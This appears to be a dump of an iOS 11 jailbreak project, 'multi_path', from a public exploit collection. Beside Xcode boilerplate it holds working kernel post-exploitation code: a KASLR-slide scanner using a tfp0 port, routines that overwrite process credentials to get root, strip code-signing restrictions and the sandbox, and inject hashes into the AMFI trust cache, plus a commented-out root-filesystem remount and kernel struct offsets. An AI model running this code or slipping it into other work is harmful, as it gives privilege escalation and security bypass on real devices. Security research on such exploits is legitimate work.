/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | multi_path.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | multi_path.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 |
16 | @end
17 |
18 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 |
11 | @interface AppDelegate ()
12 |
13 | @end
14 |
15 | @implementation AppDelegate
16 |
17 |
18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
19 | // Override point for customization after application launch.
20 | return YES;
21 | }
22 |
23 |
24 | - (void)applicationWillResignActive:(UIApplication *)application {
25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
27 | }
28 |
29 |
30 | - (void)applicationDidEnterBackground:(UIApplication *)application {
31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
33 | }
34 |
35 |
36 | - (void)applicationWillEnterForeground:(UIApplication *)application {
37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
38 | }
39 |
40 |
41 | - (void)applicationDidBecomeActive:(UIApplication *)application {
42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
43 | }
44 |
45 |
46 | - (void)applicationWillTerminate:(UIApplication *)application {
47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
48 | }
49 |
50 |
51 | @end
52 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | }
88 | ],
89 | "info" : {
90 | "version" : 1,
91 | "author" : "xcode"
92 | }
93 | }
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface ViewController : UIViewController
12 |
13 |
14 | @end
15 |
16 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import "ViewController.h"
10 | #include "sploit.h"
11 | #include "jelbrek/jelbrek.h"
12 | #include
13 | #include
14 | #include
15 |
16 | mach_port_t taskforpidzero;
17 |
18 | uint64_t find_kernel_base() {
19 | #define IMAGE_OFFSET 0x2000
20 | #define MACHO_HEADER_MAGIC 0xfeedfacf
21 | #define MAX_KASLR_SLIDE 0x21000000
22 | #define KERNEL_SEARCH_ADDRESS_IOS10 0xfffffff007004000
23 | #define KERNEL_SEARCH_ADDRESS_IOS9 0xffffff8004004000
24 | #define KERNEL_SEARCH_ADDRESS_IOS 0xffffff8000000000
25 |
26 | #define ptrSize sizeof(uintptr_t)
27 |
28 | uint64_t addr = KERNEL_SEARCH_ADDRESS_IOS10+MAX_KASLR_SLIDE;
29 |
30 |
31 | while (1) {
32 | char *buf;
33 | mach_msg_type_number_t sz = 0;
34 | kern_return_t ret = vm_read(taskforpidzero, addr, 0x200, (vm_offset_t*)&buf, &sz);
35 |
36 | if (ret) {
37 | goto next;
38 | }
39 |
40 | if (*((uint32_t *)buf) == MACHO_HEADER_MAGIC) {
41 | int ret = vm_read(taskforpidzero, addr, 0x1000, (vm_offset_t*)&buf, &sz);
42 | if (ret != KERN_SUCCESS) {
43 | printf("Failed vm_read %i\n", ret);
44 | goto next;
45 | }
46 |
47 | for (uintptr_t i=addr; i < (addr+0x2000); i+=(ptrSize)) {
48 | mach_msg_type_number_t sz;
49 | int ret = vm_read(taskforpidzero, i, 0x120, (vm_offset_t*)&buf, &sz);
50 |
51 | if (ret != KERN_SUCCESS) {
52 | printf("Failed vm_read %i\n", ret);
53 | exit(-1);
54 | }
55 | if (!strcmp(buf, "__text") && !strcmp(buf+0x10, "__PRELINK_TEXT")) {
56 |
57 | printf("kernel base: 0x%llx\nkaslr slide: 0x%llx\n", addr, addr - 0xfffffff007004000);
58 |
59 | return addr;
60 | }
61 | }
62 | }
63 |
64 | next:
65 | addr -= 0x200000;
66 | }
67 | }
68 |
69 | @interface ViewController ()
70 |
71 | @end
72 |
73 | @implementation ViewController
74 |
75 | -(void)jelbrek {
76 | get_root(getpid());
77 | empower(getpid());
78 | unsandbox(getpid());
79 |
80 |
81 | if (geteuid() == 0) {
82 | UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"root" message:@"Success! Got root!" preferredStyle:UIAlertControllerStyleAlert];
83 |
84 | UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {
85 | FILE *f = fopen("/var/mobile/.roottest", "w");
86 | if (f == 0) {
87 | UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"sandbox" message:@"Failed to escape sandbox!" preferredStyle:UIAlertControllerStyleAlert];
88 |
89 | UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];
90 |
91 | [alert addAction:defaultAction];
92 |
93 | [self presentViewController:alert animated:YES completion:nil];
94 | } else {
95 | UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"sandbox" message:[NSString stringWithFormat:@"Successfully wrote file! %p", f] preferredStyle:UIAlertControllerStyleAlert];
96 |
97 | UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];
98 |
99 | [alert addAction:defaultAction];
100 |
101 | [self presentViewController:alert animated:YES completion:nil];
102 | }
103 | fclose(f);
104 | }];
105 |
106 | [alert addAction:defaultAction];
107 |
108 | [self presentViewController:alert animated:YES completion:nil];
109 |
110 |
111 | }
112 | else {
113 | UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"root" message:@"Failed to get root!" preferredStyle:UIAlertControllerStyleAlert];
114 |
115 | UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];
116 |
117 | [alert addAction:defaultAction];
118 |
119 | [self presentViewController:alert animated:YES completion:nil];
120 | }
121 | //NSString *testbin = [NSString stringWithFormat:@"%@/test", [[NSBundle mainBundle] bundlePath]];
122 | //chmod([testbin UTF8String], 777);
123 | //trust_bin([testbin UTF8String]);
124 |
125 | //pid_t pd;
126 |
127 | //const char* args[] = {[testbin UTF8String], "101010", NULL};
128 | //int rv = posix_spawn(&pd, [testbin UTF8String], NULL, NULL, (char **)&args, NULL);
129 |
130 | }
131 | - (IBAction)go:(id)sender {
132 | taskforpidzero = go();
133 |
134 | if (taskforpidzero != MACH_PORT_NULL) {
135 | init_jelbrek(taskforpidzero, find_kernel_base());
136 | [self jelbrek];
137 | }
138 | else {
139 | UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"tfp0" message:@"Exploit failed!" preferredStyle:UIAlertControllerStyleAlert];
140 |
141 | UIAlertAction* defaultAction = [UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {}];
142 |
143 | [alert addAction:defaultAction];
144 |
145 | [self presentViewController:alert animated:YES completion:nil];
146 | }
147 | }
148 |
149 | - (void)viewDidLoad {
150 | [super viewDidLoad];
151 | // Do any additional setup after loading the view, typically from a nib.
152 | }
153 |
154 |
155 | - (void)didReceiveMemoryWarning {
156 | [super didReceiveMemoryWarning];
157 | // Dispose of any resources that can be recreated.
158 | }
159 |
160 |
161 | @end
162 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/jelbrek.h:
--------------------------------------------------------------------------------
1 |
2 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
3 | kern_return_t trust_bin(const char *path);
4 | BOOL unsandbox(pid_t pid);
5 | void empower(pid_t pid);
6 | BOOL get_root(pid_t pid);
7 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/jelbrek.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "libjb.h"
6 | #include "offsetof.h"
7 | #include "jelbrek.h"
8 | //#include "inject_criticald.h"
9 | //#include "unlocknvram.h"
10 | //#include
11 |
12 |
13 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base) {
14 | init_kernel_utils(tfp0);
15 | init_kernel(kernel_base, NULL);
16 | }
17 |
18 | kern_return_t trust_bin(const char *path) {
19 | uint64_t trust_chain = find_trustcache();
20 | uint64_t amficache = find_amficache();
21 |
22 | printf("[*] trust_chain at 0x%llx\n", trust_chain);
23 | printf("[*] amficache at 0x%llx\n", amficache);
24 |
25 | struct trust_mem mem;
26 | mem.next = kread64(trust_chain);
27 | *(uint64_t *)&mem.uuid[0] = 0xabadbabeabadbabe;
28 | *(uint64_t *)&mem.uuid[8] = 0xabadbabeabadbabe;
29 |
30 | int rv = grab_hashes(path, kread, amficache, mem.next);
31 |
32 | size_t length = (sizeof(mem) + numhash * 20 + 0xFFFF) & ~0xFFFF;
33 | uint64_t kernel_trust = kalloc(length);
34 | printf("[*] alloced: 0x%zx => 0x%llx\n", length, kernel_trust);
35 |
36 | mem.count = numhash;
37 | kwrite(kernel_trust, &mem, sizeof(mem));
38 | kwrite(kernel_trust + sizeof(mem), allhash, numhash * 20);
39 | kwrite64(trust_chain, kernel_trust);
40 |
41 | free(allhash);
42 | free(allkern);
43 | free(amfitab);
44 |
45 | if (rv == 0)
46 | printf("[*] Successfully trusted binaries? return value=%d numhash=%d\n", rv, numhash);
47 | else
48 | printf("[*] Unknown error while trusting binaries! return value=%d numhash=%d", rv, numhash);
49 | return rv;
50 | }
51 |
52 |
53 | BOOL unsandbox(pid_t pid) {
54 | uint64_t proc = proc_for_pid(pid);
55 | uint64_t ucred = kread64(proc + offsetof_p_ucred);
56 | kwrite64(kread64(ucred + 0x78) + 8 + 8, 0x0);
57 |
58 | return (kread64(kread64(ucred + 0x78) + 8 + 8) == 0) ? YES : NO;
59 | }
60 |
61 | void empower(pid_t pid) {
62 | uint64_t proc = proc_for_pid(pid);
63 | uint32_t csflags = kread32(proc + offsetof_p_csflags);
64 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);
65 | kwrite32(proc + offsetof_p_csflags, csflags);
66 | }
67 |
68 | BOOL get_root(pid_t pid) {
69 | uint64_t proc = proc_for_pid(pid);
70 | uint64_t ucred = kread64(proc + offsetof_p_ucred);
71 | kwrite32(proc + offsetof_p_uid, 0);
72 | kwrite32(proc + offsetof_p_ruid, 0);
73 | kwrite32(proc + offsetof_p_gid, 0);
74 | kwrite32(proc + offsetof_p_rgid, 0);
75 | kwrite32(ucred + offsetof_ucred_cr_uid, 0);
76 | kwrite32(ucred + offsetof_ucred_cr_ruid, 0);
77 | kwrite32(ucred + offsetof_ucred_cr_svuid, 0);
78 | kwrite32(ucred + offsetof_ucred_cr_ngroups, 1);
79 | kwrite32(ucred + offsetof_ucred_cr_groups, 0);
80 | kwrite32(ucred + offsetof_ucred_cr_rgid, 0);
81 | kwrite32(ucred + offsetof_ucred_cr_svgid, 0);
82 |
83 | return (geteuid() == 0) ? YES : NO;
84 | }
85 |
86 | /*void remount(){
87 |
88 | char *devpath = strdup("/dev/disk0s1s1");
89 | uint64_t devVnode = getVnodeAtPath(devpath);
90 | kwrite64(devVnode + off_v_specflags, 0); // clear dev vnode’s v_specflags
91 |
92 | /* 1. make a new mount of the device of root partition */
93 |
94 | /*char *newMPPath = strdup("/private/var/mobile/tmp");
95 | createDirAtPath(newMPPath);
96 | mountDevAtPathAsRW(devPath, newMPPath);
97 |
98 |
99 | /* 2. Get mnt_data from the new mount */
100 |
101 | /*uint64_t newMPVnode = getVnodeAtPath(newMPPath);
102 | uint64_t newMPMount = kread64(newMPVnode + off_v_mount);
103 | uint64_t newMPMountData = kread64(newMPMount + off_mnt_data);
104 |
105 |
106 |
107 | /* 3. Modify root mount’s flag and remount */
108 |
109 | /*uint64_t rootVnode = getVnodeAtPath("/");
110 | uint64_t rootMount = kread64(rootVnode + off_v_mount);
111 | uint32_t rootMountFlag = kread64(rootMount + off_mnt_flag);
112 | kwrite64(rootMount + off_mnt_flag, rootMountFlag & ~ ( MNT_NOSUID | MNT_RDONLY | MNT_ROOTFS));
113 |
114 | mount("apfs", "/", MNT_UPDATE, &devpath);
115 |
116 | /* 4. Replace root mount’s mnt_data with new mount’s mnt_data */
117 |
118 | /*kwrite64(rootMount + off_mnt_data, newMPMountData);
119 |
120 | }*/
121 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/kern_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // fun_utils.h
3 | // async_wake_ios
4 | //
5 | // Created by George on 18/12/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 |
22 |
23 | // Needed definitions
24 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
25 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
26 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
27 |
28 | // "General" purpose
29 | uint8_t *get_sha256(uint8_t* code_dir);
30 | uint8_t *get_code_directory(const char* name);
31 | int cp(const char *from, const char *to);
32 | int file_exist(char *filename);
33 |
34 | // Kernel utility stuff
35 | void init_kernel_utils(mach_port_t tfp0);
36 | uint64_t kalloc(vm_size_t size);
37 | size_t kread(uint64_t where, void *p, size_t size);
38 | uint32_t kread32(uint64_t where);
39 | uint64_t kread64(uint64_t where);
40 | size_t kwrite(uint64_t where, const void *p, size_t size);
41 | void kwrite32(uint64_t where, uint32_t what);
42 | void kwrite64(uint64_t where, uint64_t what);
43 | uint64_t proc_for_pid(pid_t pid);
44 | uint64_t proc_for_name(char *nm);
45 | uint64_t find_port_address(mach_port_name_t port);
46 | uint64_t task_self_addr();
47 | uint64_t kmem_alloc_wired(uint64_t size);
48 | #endif /* fun_utils_h */
49 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/libjb.h:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | #ifndef libjb_h_included
4 | #define libjb_h_included
5 |
6 |
7 |
8 | /* libhfs *******************************************************************/
9 |
10 | enum {
11 | kPermOtherExecute = 1 << 0,
12 | kPermOtherWrite = 1 << 1,
13 | kPermOtherRead = 1 << 2,
14 | kPermGroupExecute = 1 << 3,
15 | kPermGroupWrite = 1 << 4,
16 | kPermGroupRead = 1 << 5,
17 | kPermOwnerExecute = 1 << 6,
18 | kPermOwnerWrite = 1 << 7,
19 | kPermOwnerRead = 1 << 8,
20 | kPermMask = 0x1FF,
21 | kOwnerNotRoot = 1 << 9,
22 | kFileTypeUnknown = 0x0 << 16,
23 | kFileTypeFlat = 0x1 << 16,
24 | kFileTypeDirectory = 0x2 << 16,
25 | kFileTypeLink = 0x3 << 16,
26 | kFileTypeMask = 0x3 << 16
27 | };
28 |
29 | typedef long CICell;
30 |
31 | extern char *gLoadAddr; /* buffer of size 32MB (max file size) */
32 |
33 | CICell HFSOpen(const char *filename, long offset);
34 | long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length);
35 | long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time);
36 | void HFSClose(CICell);
37 |
38 | /* untar ********************************************************************/
39 |
40 | /* untar 'a' to current directory. path is name of archive (informational) */
41 | void untar(FILE *a, const char *path);
42 |
43 | /* launchctl ****************************************************************/
44 |
45 | int launchctl_load_cmd(const char *filename, int do_load, int opt_force, int opt_write);
46 |
47 | /* hashes *******************************************************************/
48 |
49 | struct trust_dsk {
50 | unsigned int version;
51 | unsigned char uuid[16];
52 | unsigned int count;
53 | //unsigned char data[];
54 | } __attribute__((packed));
55 |
56 | struct trust_mem {
57 | uint64_t next; //struct trust_mem *next;
58 | unsigned char uuid[16];
59 | unsigned int count;
60 | //unsigned char data[];
61 | } __attribute__((packed));
62 |
63 | struct hash_entry_t {
64 | uint16_t num;
65 | uint16_t start;
66 | } __attribute__((packed));
67 |
68 | typedef uint8_t hash_t[20];
69 |
70 | extern hash_t *allhash;
71 | extern unsigned numhash;
72 | extern struct hash_entry_t *amfitab;
73 | extern hash_t *allkern;
74 |
75 | /* can be called multiple times. kernel read func & amfi/top trust chain block are optional */
76 | int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top);
77 |
78 | #endif
79 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/offsetof.c:
--------------------------------------------------------------------------------
1 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid
2 | unsigned offsetof_task = 0x18; // proc_t::task
3 | unsigned offsetof_p_uid = 0x30; // proc_t::p_uid
4 | unsigned offsetof_p_gid = 0x34; // proc_t::p_uid
5 | unsigned offsetof_p_ruid = 0x38; // proc_t::p_uid
6 | unsigned offsetof_p_rgid = 0x3c; // proc_t::p_uid
7 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred
8 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags
9 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)
10 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)
11 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)
12 | unsigned offsetof_itk_space = 0x308; // task_t::itk_space
13 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)
14 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)
15 | unsigned offsetof_ip_kobject = 0x68; // ipc_port_t::ip_kobject
16 | unsigned offsetof_p_textvp = 0x248; // proc_t::p_textvp
17 | unsigned offsetof_p_textoff = 0x250; // proc_t::p_textoff
18 | unsigned offsetof_p_cputype = 0x2c0; // proc_t::p_cputype
19 | unsigned offsetof_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype
20 | unsigned offsetof_special = 2 * sizeof(long); // host::special
21 | unsigned offsetof_ipc_space_is_table = 0x20; // ipc_space::is_table?..
22 |
23 | unsigned offsetof_ucred_cr_uid = 0x18; // ucred::cr_uid
24 | unsigned offsetof_ucred_cr_ruid = 0x1c; // ucred::cr_ruid
25 | unsigned offsetof_ucred_cr_svuid = 0x20; // ucred::cr_svuid
26 | unsigned offsetof_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups
27 | unsigned offsetof_ucred_cr_groups = 0x28; // ucred::cr_groups
28 | unsigned offsetof_ucred_cr_rgid = 0x68; // ucred::cr_rgid
29 | unsigned offsetof_ucred_cr_svgid = 0x6c; // ucred::cr_svgid
30 |
31 | unsigned offsetof_v_type = 0x70; // vnode::v_type
32 | unsigned offsetof_v_id = 0x74; // vnode::v_id
33 | unsigned offsetof_v_ubcinfo = 0x78; // vnode::v_ubcinfo
34 |
35 | unsigned offsetof_ubcinfo_csblobs = 0x50; // ubc_info::csblobs
36 |
37 | unsigned offsetof_csb_cputype = 0x8; // cs_blob::csb_cputype
38 | unsigned offsetof_csb_flags = 0x12; // cs_blob::csb_flags
39 | unsigned offsetof_csb_base_offset = 0x16; // cs_blob::csb_base_offset
40 | unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
41 | unsigned offsetof_csb_signer_type = 0xA0; // cs_blob::csb_signer_type
42 | unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
43 | unsigned offsetof_csb_platform_path = 0xA8; // cs_blob::csb_platform_path
44 |
45 | unsigned offsetof_t_flags = 0x3a0; // task::t_flags
46 |
47 |
48 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/offsetof.h:
--------------------------------------------------------------------------------
1 |
2 | extern unsigned offsetof_p_pid;
3 | extern unsigned offsetof_task;
4 | extern unsigned offsetof_p_uid;
5 | extern unsigned offsetof_p_gid;
6 | extern unsigned offsetof_p_ruid;
7 | extern unsigned offsetof_p_rgid;
8 | extern unsigned offsetof_p_ucred;
9 | extern unsigned offsetof_p_csflags;
10 | extern unsigned offsetof_itk_self;
11 | extern unsigned offsetof_itk_sself;
12 | extern unsigned offsetof_itk_bootstrap;
13 | extern unsigned offsetof_itk_space;
14 | extern unsigned offsetof_ip_mscount;
15 | extern unsigned offsetof_ip_srights;
16 | extern unsigned offsetof_ip_kobject;
17 | extern unsigned offsetof_p_textvp;
18 | extern unsigned offsetof_p_textoff;
19 | extern unsigned offsetof_p_cputype;
20 | extern unsigned offsetof_p_cpu_subtype;
21 | extern unsigned offsetof_special;
22 | extern unsigned offsetof_ipc_space_is_table;
23 |
24 | extern unsigned offsetof_ucred_cr_uid;
25 | extern unsigned offsetof_ucred_cr_ruid;
26 | extern unsigned offsetof_ucred_cr_gid;
27 | extern unsigned offsetof_ucred_cr_rgid;
28 | extern unsigned offsetof_ucred_cr_svgid;
29 | extern unsigned offsetof_ucred_cr_groups;
30 | extern unsigned offsetof_ucred_cr_ngroups;
31 | extern unsigned offsetof_ucred_cr_svuid;
32 |
33 | extern unsigned offsetof_v_type;
34 | extern unsigned offsetof_v_id;
35 | extern unsigned offsetof_v_ubcinfo;
36 |
37 | extern unsigned offsetof_ubcinfo_csblobs;
38 |
39 | extern unsigned offsetof_csb_cputype;
40 | extern unsigned offsetof_csb_flags;
